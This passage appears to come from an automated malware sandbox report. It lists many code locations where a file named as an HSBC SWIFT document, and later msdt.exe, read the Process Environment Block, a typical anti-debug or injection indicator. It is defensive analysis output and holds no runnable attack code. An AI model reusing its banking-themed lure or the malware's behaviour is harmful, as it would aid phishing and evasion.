          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195AA16 mov eax, dword ptr fs:[00000030h]8_2_0195AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195AA16 mov eax, dword ptr fs:[00000030h]8_2_0195AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B3A1C mov eax, dword ptr fs:[00000030h]8_2_018B3A1C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov eax, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov ecx, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov eax, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov eax, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189AA16 mov eax, dword ptr fs:[00000030h]8_2_0189AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189AA16 mov eax, dword ptr fs:[00000030h]8_2_0189AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D4A2C mov eax, dword ptr fs:[00000030h]8_2_018D4A2C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D4A2C mov eax, dword ptr fs:[00000030h]8_2_018D4A2C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195EA55 mov eax, dword ptr fs:[00000030h]8_2_0195EA55
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01924257 mov eax, dword ptr fs:[00000030h]8_2_01924257
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194B260 mov eax, dword ptr fs:[00000030h]8_2_0194B260
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194B260 mov eax, dword ptr fs:[00000030h]8_2_0194B260
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968A62 mov eax, dword ptr fs:[00000030h]8_2_01968A62
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D927A mov eax, dword ptr fs:[00000030h]8_2_018D927A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CFD9B mov eax, dword ptr fs:[00000030h]8_2_018CFD9B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CFD9B mov eax, dword ptr fs:[00000030h]8_2_018CFD9B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C35A1 mov eax, dword ptr fs:[00000030h]8_2_018C35A1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C1DB5 mov eax, dword ptr fs:[00000030h]8_2_018C1DB5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C1DB5 mov eax, dword ptr fs:[00000030h]8_2_018C1DB5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C1DB5 mov eax, dword ptr fs:[00000030h]8_2_018C1DB5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019605AC mov eax, dword ptr fs:[00000030h]8_2_019605AC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019605AC mov eax, dword ptr fs:[00000030h]8_2_019605AC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov ecx, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01948DF1 mov eax, dword ptr fs:[00000030h]8_2_01948DF1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AD5E0 mov eax, dword ptr fs:[00000030h]8_2_018AD5E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AD5E0 mov eax, dword ptr fs:[00000030h]8_2_018AD5E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968D34 mov eax, dword ptr fs:[00000030h]8_2_01968D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0191A537 mov eax, dword ptr fs:[00000030h]8_2_0191A537
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195E539 mov eax, dword ptr fs:[00000030h]8_2_0195E539
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4D3B mov eax, dword ptr fs:[00000030h]8_2_018C4D3B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4D3B mov eax, dword ptr fs:[00000030h]8_2_018C4D3B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4D3B mov eax, dword ptr fs:[00000030h]8_2_018C4D3B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189AD30 mov eax, dword ptr fs:[00000030h]8_2_0189AD30
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D3D43 mov eax, dword ptr fs:[00000030h]8_2_018D3D43
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01913540 mov eax, dword ptr fs:[00000030h]8_2_01913540
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01943D40 mov eax, dword ptr fs:[00000030h]8_2_01943D40
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B7D50 mov eax, dword ptr fs:[00000030h]8_2_018B7D50
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BC577 mov eax, dword ptr fs:[00000030h]8_2_018BC577
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BC577 mov eax, dword ptr fs:[00000030h]8_2_018BC577
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A849B mov eax, dword ptr fs:[00000030h]8_2_018A849B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968CD6 mov eax, dword ptr fs:[00000030h]8_2_01968CD6
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916CF0 mov eax, dword ptr fs:[00000030h]8_2_01916CF0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916CF0 mov eax, dword ptr fs:[00000030h]8_2_01916CF0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916CF0 mov eax, dword ptr fs:[00000030h]8_2_01916CF0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019514FB mov eax, dword ptr fs:[00000030h]8_2_019514FB
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196740D mov eax, dword ptr fs:[00000030h]8_2_0196740D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196740D mov eax, dword ptr fs:[00000030h]8_2_0196740D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196740D mov eax, dword ptr fs:[00000030h]8_2_0196740D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CBC2C mov eax, dword ptr fs:[00000030h]8_2_018CBC2C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192C450 mov eax, dword ptr fs:[00000030h]8_2_0192C450
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192C450 mov eax, dword ptr fs:[00000030h]8_2_0192C450
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA44B mov eax, dword ptr fs:[00000030h]8_2_018CA44B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B746D mov eax, dword ptr fs:[00000030h]8_2_018B746D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917794 mov eax, dword ptr fs:[00000030h]8_2_01917794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917794 mov eax, dword ptr fs:[00000030h]8_2_01917794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917794 mov eax, dword ptr fs:[00000030h]8_2_01917794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A8794 mov eax, dword ptr fs:[00000030h]8_2_018A8794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D37F5 mov eax, dword ptr fs:[00000030h]8_2_018D37F5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192FF10 mov eax, dword ptr fs:[00000030h]8_2_0192FF10
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192FF10 mov eax, dword ptr fs:[00000030h]8_2_0192FF10
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA70E mov eax, dword ptr fs:[00000030h]8_2_018CA70E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA70E mov eax, dword ptr fs:[00000030h]8_2_018CA70E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196070D mov eax, dword ptr fs:[00000030h]8_2_0196070D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196070D mov eax, dword ptr fs:[00000030h]8_2_0196070D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BF716 mov eax, dword ptr fs:[00000030h]8_2_018BF716
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01894F2E mov eax, dword ptr fs:[00000030h]8_2_01894F2E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01894F2E mov eax, dword ptr fs:[00000030h]8_2_01894F2E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CE730 mov eax, dword ptr fs:[00000030h]8_2_018CE730
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AEF40 mov eax, dword ptr fs:[00000030h]8_2_018AEF40
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AFF60 mov eax, dword ptr fs:[00000030h]8_2_018AFF60
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968F6A mov eax, dword ptr fs:[00000030h]8_2_01968F6A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192FE87 mov eax, dword ptr fs:[00000030h]8_2_0192FE87
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01960EA5 mov eax, dword ptr fs:[00000030h]8_2_01960EA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01960EA5 mov eax, dword ptr fs:[00000030h]8_2_01960EA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01960EA5 mov eax, dword ptr fs:[00000030h]8_2_01960EA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019146A7 mov eax, dword ptr fs:[00000030h]8_2_019146A7
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968ED6 mov eax, dword ptr fs:[00000030h]8_2_01968ED6
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C36CC mov eax, dword ptr fs:[00000030h]8_2_018C36CC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D8EC7 mov eax, dword ptr fs:[00000030h]8_2_018D8EC7
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194FEC0 mov eax, dword ptr fs:[00000030h]8_2_0194FEC0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A76E2 mov eax, dword ptr fs:[00000030h]8_2_018A76E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C16E0 mov ecx, dword ptr fs:[00000030h]8_2_018C16E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189C600 mov eax, dword ptr fs:[00000030h]8_2_0189C600
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189C600 mov eax, dword ptr fs:[00000030h]8_2_0189C600
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189C600 mov eax, dword ptr fs:[00000030h]8_2_0189C600
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C8E00 mov eax, dword ptr fs:[00000030h]8_2_018C8E00
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA61C mov eax, dword ptr fs:[00000030h]8_2_018CA61C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA61C mov eax, dword ptr fs:[00000030h]8_2_018CA61C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951608 mov eax, dword ptr fs:[00000030h]8_2_01951608
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189E620 mov eax, dword ptr fs:[00000030h]8_2_0189E620
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194FE3F mov eax, dword ptr fs:[00000030h]8_2_0194FE3F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195AE44 mov eax, dword ptr fs:[00000030h]8_2_0195AE44
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_0195AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Code function: 8_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05453D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05493540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05437D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0543C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0541AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0549A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05496DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0542D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0543746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 20_2_0544BC2C mov eax, dword ptr fs:[00000030h]
